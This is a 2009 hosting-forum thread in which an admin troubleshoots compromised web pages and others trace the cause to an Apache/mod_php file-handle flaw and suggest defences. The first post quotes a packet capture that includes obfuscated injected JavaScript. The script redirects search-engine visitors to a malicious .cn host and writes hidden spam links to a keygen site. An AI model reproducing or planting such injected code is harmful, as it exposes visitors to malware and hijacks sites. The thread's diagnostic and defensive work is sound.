1. Please take a little time for this simple survey! Thank you for participating!
    Dismiss Notice
  2. Dear Pleskians, please read this carefully! New attachments and other rules Thank you!
    Dismiss Notice
  3. Dear Pleskians, I really hope that you will share your opinion in this Special topic for chatter about Plesk in the Clouds. Thank you!
    Dismiss Notice

virus on random web pages at random intervals

Discussion in 'Plesk 9.x for Linux Issues, Fixes, How-To' started by irian, Nov 13, 2009.

  1. irian

    irian Guest

    0
     
    hello,

    we are experiencing a strange behavior with our web pages.
    At irregular time intervals, on random web pages, the client instead of getting the normal web page gets a page containing a virus.
    Here a wireshark client capture from such a web page:

    GET / HTTP/1.1

    Accept: image/gif, image/x-xbitmap, image/jpeg, application/x-ms-application, application/vnd.ms-xpsdocument, application/xaml+xml, application/x-ms-xbap, application/vnd.ms-excel, application/vnd.ms-powerpoint, application/msword, image/pjpeg, application/x-shockwave-flash, */*

    Accept-Language: ro

    UA-CPU: x86

    Accept-Encoding: gzip, deflate

    User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.5.30729; .NET CLR 3.0.30618; .NET CLR 1.1.4322)

    Host: ................

    Connection: Keep-Alive



    HTTP/1.1 200 OK

    Date: Thu, 05 Nov 2009 20:26:31 GMT

    Server: Apache

    X-Powered-By: PHP/5.2.6

    Connection: close

    Transfer-Encoding: chunked

    Content-Type: text/html; charset=UTF-8



    8f53

    <script type="text/javascript" language="javascript"> var atzve=new Date( ); atzve.setTime(atzve.getTime( )+12*60*60*1000); document.cookie="n_sess_id=a719c4e\x30f2\x321\x37a2\x660036d87ebeb145b\x39"+"\x3b p\x61\164\x68=/; ex\x70ires\x3d"+atzve.toGMTString( ); </script>

    <script type="text/javascript" language="javascript"> var mdpfi=new Array("\x68tt\x70:/\x2fsneak\x2dpea\x6b.cn/?p\x69d=180s\x308\x26s\x69d=3c5779","htt\x70://\x73\x6ee\x61\x6b-pea\x6b.cn/?pid=180s0\x39&sid=\x33c57\x379"); var ajxkvmr="ca\x2cco,d\x61\054\x64e,cy\x2cel,e\x6e,eo\x2ces,\x66i,\x66r,g\x61,\x69t,\x6aa,\x6ai,\x6bn\x2cn\x6c,n
    ; return; }function birh( ){return document.referrer.indexOf("\x67o\x6f\x67le.")!=-1 || document.referrer.indexOf("\x79aho\x6f\x2e")!=-1 || document.referrer.indexOf("bi\x6eg.")!=-1; } </script>.........



    206b

    <script>document.write(String.fromCharCode(60,100,105,118,32,115,116,121,108,101,61,39,100,105,115,112,108,97,121,58,110,111,110,101,39,62))</script><a href="http://keygenguru.com/movies.php">movie downloads</a>&nbsp; <a href="http://keygenguru.com/movies.php">legal movies</a>&nbsp; <a href="http://keygenguru.com/movies.php">movies for ipod</a>&nbsp; <h1><a href="http://keygenguru.com/movies.php">divx online</a>&nbsp; </h1>232.198.198.95 <a href="http://keygenguru.com/software/microsoft-office-2003-professional-with-business-contact-manager-for-outlook.html">Download Microsoft Office 2003</a>&nbsp; <h1><a href="http://keygenguru.com/software/sony-vegas-pro-90.html">Download Sony Vegas Pro 9.0</a>&nbsp; </h1><h1><a href="http://keygenguru.com/software/adobe-........

    We have verified all the packages on our system and they seem ok. We installed and run rkhunter to check for rootkits and found none.
    We run rkhunter --propupd on a new/clean system and placed the files database it on the problematic machine and all the standard binary files are identical between the two machines
    The only suspect file that showed when verifying all the rpms was /usr/sbin/suexec.

    It was different than /usr/local/psa/suexec/psa-suexec but not from a rootkit, but because it was modified by prelink.

    The problem is hard to debug because it manifests itself randomly.

    Do you have any ideea how to trace and solve this kind of problem???

    P.S
    It is not a dns spoofed page, because the server ip that appears in the wireshark capture taken on the client is the correct one.

    thank you
     
  2. ISPA

    ISPA Guest

    0
     
  3. ISPA

    ISPA Guest

    0
     
  4. irian

    irian Guest

    0
     
    thank you very much for the information.

    We were able to find the IP that issued the POST commands and block it.
    We found two suspicious php scripts using your grep command.
    One looks like a wordpress theme footer (/var/www/vhosts/domain1.name/httpdocs/wp-content/themes/epsilon/footer.php)and one is the footer.php of a wordpress install (/var/www/vhosts/domain2.name/httpdocs/blog/footer.php).
    I will de-obfuscate the scripts and post them here if they are mallicious.

    I still don't know what bug / exploit this mallware is using.
    We are using CentOS 5 with all the patches applied and we tested the server with your script and it seems ok.
    We had to modify the script because /proc/*/fd is only readable by root and we are using open_basedir to restrict access to specific directories.

    Forking form the perl script works but the child does not inherit the file handles of the parent.

    I think this mallware is exploiting a security issue present in apache/mod_php that is not yet known to the developers.
     
  5. lvalics

    lvalics Silver Pleskian Plesk Guru

    36
    43%
    Joined:
    Jun 20, 2003
    Messages:
    965
    Likes Received:
    32
    Location:
    Romania
    Please click one of the Quick Reply icons in the posts above to activate Quick Reply.
     
  6. lvalics

    lvalics Silver Pleskian Plesk Guru

    36
    43%
    Joined:
    Jun 20, 2003
    Messages:
    965
    Likes Received:
    32
    Location:
    Romania
  7. ISPA

    ISPA Guest

    0
     
    false negative

    Hi,

    I discovered today that unless you are using mod_perl, then the test script will always come up as negative. (my centos5 install does not use mod_perl by default.)

    I'm working on a PHP-based test that I'm hoping to have ready soon.

    Check back soon.

    - an admin
     
  8. ISPA

    ISPA Guest

    0
     
    PHP test code available now

    Hi,

    Today I discovered that forking a child process is part of the magic that enables this to work.

    I've finished writing a PHP-based testing script. This new test is a much more accurate test than the previous perl based one.

    Try this code:

    http://smaert.com/apache_mischief/apr_test.php.txt

    ... and you'll see a list of all the file-handles that a malicious script can gain access to...
     
  9. atomicturtle

    atomicturtle Golden Pleskian

    29
     
    Joined:
    Nov 20, 2002
    Messages:
    2,110
    Likes Received:
    7
    Location:
    Washington, DC
    Great investigation work, did you ever manage to capture a copy of the eplhttpd file referenced in the document? Any idea if that was a compiled binary or something interpreted (perl, etc).

    Ive made a few enhancements to ASL based on your techniques here that might be useful, one is kernel level exec logging based on a user ID. This would give you a historical log of everything forked by apache in an exec/poll/etc type event. And coupled with ossec or another log analysis utility, could give you near real-time detection.

    We've also put together some new clamav rules based on the malware patterns you're seeing, this would help catch the file on an upload event through apache, or ftp if you're using mod_security and/or proftpd w/ clamav (all in ASL).

    Last but not least, we're sorting out an RBAC rule to restrict init 1 parent apache processes from accessing an apache socket that is owned by a different parent. If I had to hazard a guess, this is actually a "feature" in apache for specific DSO. It might be worth a shot to crawl through the various modules to see how the behaviour changes.
     
  10. ISPA

    ISPA Guest

    0
     
    Bug conclusively identified, Security Focus bid located...

    UPDATE: After honing my search terms, I'm getting closer to having answers for who
    to blame. I've located bug reports on the exact issue in conversations between
    apache and php developers arguing over who's problem this actually is.

    See: http://www.securityfocus.com/bid/9302
    See: http://www.securityfocus.com/archive/1/archive/1/449298/100/0/threaded
    See: http://bugs.php.net/bug.php?id=38915

    The last post (on July 3rd, 2009) on the php.net site is claiming that this is finally fixed in apache.
    They provide a diff to apache's exec.c, but the author admits it's an ugly fix...
    And my CentOS 4 and 5 boxes are still vulnerable...
     
  11. ISPA

    ISPA Guest

    0
     
  12. ISPA

    ISPA Guest

    0
     
    I'm pretty sure it was a compiled binary that it dropped and ran, but I can't recall what led me to that belief.

    Sorry, I'm kicking myself for not capturing a sniff of the code that was being posted to the script.

    The trojaned PHP script was removed from my server weeks ago, so I no longer have the ability to capture payloads.

    If I get any more of these, i'll be sure to reply back here with any captured code.
     
Loading...